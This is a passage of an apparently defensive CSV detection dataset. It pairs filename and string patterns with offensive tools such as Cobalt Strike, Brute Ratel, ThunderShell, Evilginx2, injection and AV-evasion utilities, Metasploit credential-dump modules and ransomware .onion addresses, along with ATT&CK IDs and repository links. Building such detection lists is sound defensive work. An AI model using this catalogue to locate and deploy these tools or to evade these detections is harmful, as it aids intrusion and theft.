TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","61259"
"*third-party*winvnc*.dll*",".{0,1000}third\-party.{0,1000}winvnc.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61260"
"*This backdoor requires Admin :(*",".{0,1000}This\sbackdoor\srequires\sAdmin\s\:\(.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","61261"
"*This is similar to psexec -s \*",".{0,1000}This\sis\ssimilar\sto\spsexec\s\-s\s\\.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#content","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","61262"
"*This is the modified maintained version of Evilginx2. No one will be held responsible for your activities*",".{0,1000}This\sis\sthe\smodified\smaintained\sversion\sof\sEvilginx2\.\sNo\sone\swill\sbe\sheld\sresponsible\sfor\syour\sactivities.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#content","N/A","10","","N/A","","","","61263"
"*This option will cause DDSpoof to create DNS records on the server*",".{0,1000}This\soption\swill\scause\sDDSpoof\sto\screate\sDNS\srecords\son\sthe\sserver.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","61264"
"*this.is.not.a.phishing.site.evilsite.com*",".{0,1000}this\.is\.not\.a\.phishing\.site\.evilsite\.com.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","61265"
"*thisisateststringdontcatchme*",".{0,1000}thisisateststringdontcatchme.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","61266"
"*ThisIsNotRat-main*",".{0,1000}ThisIsNotRat\-main.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","N/A","9","10","64","17","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z","61267"
"*thoth.py -*",".{0,1000}thoth\.py\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","61268"
"*thoth-master.zip*",".{0,1000}thoth\-master\.zip.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","61269"
"*Thread_Hiijack_Inject_Load.*",".{0,1000}Thread_Hiijack_Inject_Load\..{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","61270"
"*thread-injector.exe *",".{0,1000}thread\-injector\.exe\s.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","61271"
"*Threadless injection failed*",".{0,1000}Threadless\sinjection\sfailed.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","61272"
"*ThreadlessInject* -p * -d *",".{0,1000}ThreadlessInject.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","61273"
"*ThreadlessInject.exe*",".{0,1000}ThreadlessInject\.exe.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","61274"
"*ThreadlessInject-master*",".{0,1000}ThreadlessInject\-master.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","61275"
"*ThreadPoolInjection.lastbuildstate*",".{0,1000}ThreadPoolInjection\.lastbuildstate.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","61276"
"*Thread-Pool-Injection-PoC-main*",".{0,1000}Thread\-Pool\-Injection\-PoC\-main.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","61277"
"*threads all alertable*",".{0,1000}threads\sall\salertable.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61278"
"*ThreadStackSpoofer*",".{0,1000}ThreadStackSpoofer.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","61279"
"*ThreatCheck.csproj*",".{0,1000}ThreatCheck\.csproj.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","61280"
"*ThreatCheck.csproj*",".{0,1000}ThreatCheck\.csproj.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","61281"
"*ThreatCheck.exe*",".{0,1000}ThreatCheck\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","61282"
"*ThreatCheck.exe*",".{0,1000}ThreatCheck\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","61283"
"*ThreatCheck-master*",".{0,1000}ThreatCheck\-master.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","61284"
"*threatexpress*malleable*",".{0,1000}threatexpress.{0,1000}malleable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","61285"
"*threatexpress/cs2modrewrite*",".{0,1000}threatexpress\/cs2modrewrite.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","61286"
"*threatpatrols/sshamble*",".{0,1000}threatpatrols\/sshamble.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","61287"
"*threeam7fj33rv5twe5ll7gcrp3kkyyt6ez5stssixnuwh4v3csxdwqd.onion*",".{0,1000}threeam7fj33rv5twe5ll7gcrp3kkyyt6ez5stssixnuwh4v3csxdwqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61288"
"*Throwback\Base64_RC4.h*",".{0,1000}Throwback\\Base64_RC4\.h.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61289"
"*throwback_x64.exe*",".{0,1000}throwback_x64\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61290"
"*throwback_x86.exe*",".{0,1000}throwback_x86\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61291"
"*throwBackDev.exe*",".{0,1000}throwBackDev\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61292"
"*ThrowbackDLL.cpp*",".{0,1000}ThrowbackDLL\.cpp.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61293"
"*ThrowbackDLL.exe*",".{0,1000}ThrowbackDLL\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61294"
"*ThrowbackDLL.vcxproj*",".{0,1000}ThrowbackDLL\.vcxproj.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61295"
"*ThunderDNS*.php*",".{0,1000}ThunderDNS.{0,1000}\.php.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","61296"
"*ThunderDNS*.ps1*",".{0,1000}ThunderDNS.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","61297"
"*ThunderDNS*.py*",".{0,1000}ThunderDNS.{0,1000}\.py.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","61298"
"*ThunderDNS.git*",".{0,1000}ThunderDNS\.git.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","N/A","10","10","410","63","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z","61299"
"*ThunderFox.exe*",".{0,1000}ThunderFox\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","61300"
"*ThunderShell.git*",".{0,1000}ThunderShell\.git.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","61301"
"*ThunderShell.py*",".{0,1000}ThunderShell\.py.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","61302"
"*ThunderShell-master.zip*",".{0,1000}ThunderShell\-master\.zip.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","61303"
"*thw73ky2jphtcfrwoze5ddk3wbkc2t24r55guu3agwjchn3g6p755kyd.onion*",".{0,1000}thw73ky2jphtcfrwoze5ddk3wbkc2t24r55guu3agwjchn3g6p755kyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61304"
"*thycotic_secretserver_dump.*",".{0,1000}thycotic_secretserver_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61305"
"*tiagorlampert/CHAOS*",".{0,1000}tiagorlampert\/CHAOS.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","61306"
"*tiagorlampert/chaos:latest*",".{0,1000}tiagorlampert\/chaos\:latest.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","61307"
